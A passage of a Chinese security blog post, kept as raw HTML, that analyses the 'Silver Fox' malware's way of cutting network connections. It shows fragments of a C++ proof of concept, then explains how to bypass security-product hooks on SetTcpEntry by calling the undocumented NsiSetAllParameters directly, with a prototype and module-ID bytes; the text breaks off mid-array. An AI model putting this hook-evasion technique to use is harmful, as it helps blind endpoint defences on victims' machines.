Aptos;font-variant: normal;text-transform: none;"><span leaf="">);</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">std</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">::</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">cout </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&lt;&lt;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&#34;[+] Done</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;SpecialCharTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">\n</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&#34;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">VirtualFree</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">exec, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;DecValTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0, MEM_RELEASE</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">);</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;" lang="EN-US"><span style="mso-tab-count:1 Blank;"><span leaf="">           </span></span><span leaf="">getchar</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">();</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;CommentTok&#39;;color: #60A0B0;font-style: italic;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">// Wait for user input before exiting</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">return</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;DecValTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">}</span></span></span></p><p style=""><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><img style="width:560.010009765625px;height:316.4900207519531px;" class="rich_pages wxw-img" data-ratio="0.5651465798045603" data-w="1842" src="https://wechat2rss.xlab.app/img-proxy/?k=efb9e12a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9cM4QgB2vEjiaSUaaPxjw9XXrkib1ZnibXhSXJpGFdy77vibhMjMjutkKBtF2ArxW6f6EHXex7KVXdTMA%2F640%3Fwx_fmt%3Dpng"/></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: Aptos;mso-fareast-font-family: &#39;Aptos&#39;;mso-fareast-language: EN-US;font-weight: normal;mso-bidi-font-weight: normal;"><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf="">我们恢复网络试一下</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: Aptos;mso-fareast-font-family: &#39;Aptos&#39;;mso-fareast-language: EN-US;font-weight: normal;mso-bidi-font-weight: normal;"><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><img style="width:560.010009765625px;height:327.6700134277344px;" class="rich_pages wxw-img" data-ratio="0.5851239669421487" data-w="1815" src="https://wechat2rss.xlab.app/img-proxy/?k=1bc745f0&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9cM4QgB2vEjiaSUaaPxjw9XXtaFfL0ocLQj6wZwy1xn4ibQ3dh0ZTmVIeTJwiaeiaye32mhGXZsUyHyMg%2F640%3Fwx_fmt%3Dpng"/></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: Aptos;mso-fareast-font-family: &#39;Aptos&#39;;mso-fareast-language: EN-US;font-weight: normal;mso-bidi-font-weight: normal;"><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf="">测试一个断网条件下的。。。。</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: Aptos;mso-fareast-font-family: &#39;Aptos&#39;;mso-fareast-language: EN-US;font-weight: normal;mso-bidi-font-weight: normal;"><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><img style="width:560.010009765625px;height:310.4500427246094px;" class="rich_pages wxw-img" data-ratio="0.5543652919121586" data-w="1867" src="https://wechat2rss.xlab.app/img-proxy/?k=c7c4253b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9cM4QgB2vEjiaSUaaPxjw9XXicMIXbuvM1DcZ6bhOlqnywxKdC0WbzCFmajZs9OYpHa5xypn0BEzIYQ%2F640%3Fwx_fmt%3Dpng"/></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: Aptos;mso-fareast-font-family: &#39;Aptos&#39;;mso-fareast-language: EN-US;font-weight: normal;mso-bidi-font-weight: normal;"><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf="">那么我们思考一下如果 SetTcpEntry 被安全产品 Hook 掉（比如通过 API 拦截、Inline Hook），那这条路就走不通了，怎么办 ？我们不妨去看一眼底层的实现重点是看</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;font-weight:bold;mso-bidi-font-weight:bold;"><span leaf="">SetTcpEntry</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: Aptos;mso-fareast-font-family: &#39;Aptos&#39;;mso-fareast-language: EN-US;font-weight: normal;mso-bidi-font-weight: normal;"><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><img style="width:560.010009765625px;height:311.6300048828125px;" class="rich_pages wxw-img" data-ratio="0.5564668769716088" data-w="1585" src="https://wechat2rss.xlab.app/img-proxy/?k=5209ec43&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9cM4QgB2vEjiaSUaaPxjw9XXicm973n2WIQrIL73Ne91tOXKy2jJL8X27ZDyo472yKmkhicz8OB1MAZA%2F640%3Fwx_fmt%3Dpng"/></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: Aptos;mso-fareast-font-family: &#39;Aptos&#39;;mso-fareast-language: EN-US;font-weight: normal;mso-bidi-font-weight: normal;"><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf="">通过反汇编 iphlpapi.dll 中的 SetTcpEntry，可以发现它的底层并不是直接修改 TCP 表，而是依赖了</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style=""><span leaf="">NsiSetAllParameters</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""> 这是一个非公开（Undocumented）的 Windows 内部函数，属于 NSI（Network Store Interface）服务的 API 范畴，主要用于设置网络堆栈中的参数。</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: Aptos;mso-fareast-font-family: &#39;Aptos&#39;;mso-fareast-language: EN-US;font-weight: normal;mso-bidi-font-weight: normal;"><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf="">推断的函数原型如下：</span></span></span></p><p style="mso-style-name: &#39;Source Code&#39;;margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;mso-pagination: widow-orphan;word-break: break-all;font-size: 12.0pt;font-family: Aptos;mso-fareast-font-family: &#39;Aptos&#39;;mso-fareast-language: EN-US;font-weight: normal;mso-bidi-font-weight: normal;"><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;KeywordTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">typedef</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> NTSTATUS </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">NTAPI</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">*</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> NsiSetAllParameters_t</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">HANDLE NsiHandle,            </span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">DWORD ObjectIndex,            </span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">DWORD ObjectType,            </span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">PVOID InputBuffer,            </span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">DWORD InputBufferLength,            </span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">PVOID OutputBuffer,            </span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">DWORD OutputBufferLength</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">);</span></span></span></p><p style=""><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf="">也就是说我们可以手动实现一个 SetTcpEntry 避免使用 SetTcpEntry</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: Aptos;mso-fareast-font-family: &#39;Aptos&#39;;mso-fareast-language: EN-US;font-weight: normal;mso-bidi-font-weight: normal;"><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf="">我们需要关注一下他的这些参数，比如 NPI_MS_TCP_MODULEID</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: Aptos;mso-fareast-font-family: &#39;Aptos&#39;;mso-fareast-language: EN-US;font-weight: normal;mso-bidi-font-weight: normal;"><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf="">这是一个 GUID结构，用来标识TCP 协议模块告诉 NsiSetAllParameters 要对哪一类协议数据执行操作。（猜的）</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: Aptos;mso-fareast-font-family: &#39;Aptos&#39;;mso-fareast-language: EN-US;font-weight: normal;mso-bidi-font-weight: normal;"><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><img style="width:560.010009765625px;height:267.69000244140625px;" class="rich_pages wxw-img" data-ratio="0.4780114722753346" data-w="1046" src="https://wechat2rss.xlab.app/img-proxy/?k=9e77fe01&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9cM4QgB2vEjiaSUaaPxjw9XXrhb0ib0cE70JiahSwsibxcw2iaWgtdu4L9owCDrfZ5APxjtg70Xpdp5A7A%2F640%3Fwx_fmt%3Dpng"/></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: Aptos;mso-fareast-font-family: &#39;Aptos&#39;;mso-fareast-language: EN-US;font-weight: normal;mso-bidi-font-weight: normal;"><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf="">还原就是</span></span></span></p><p style="mso-style-name: &#39;Source Code&#39;;margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;mso-pagination: widow-orphan;word-break: break-all;font-size: 12.0pt;font-family: Aptos;mso-fareast-font-family: &#39;Aptos&#39;;mso-fareast-language: EN-US;font-weight: normal;mso-bidi-font-weight: normal;"><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">BYTE NPI_MS_TCP_MODULEID</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">[]</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">{</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;BaseNTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0x18, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;BaseNTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0x00, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;BaseNTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0x00, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;BaseNTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0x00, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;BaseNTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0x01, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;BaseNTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0x00, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;BaseNTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: 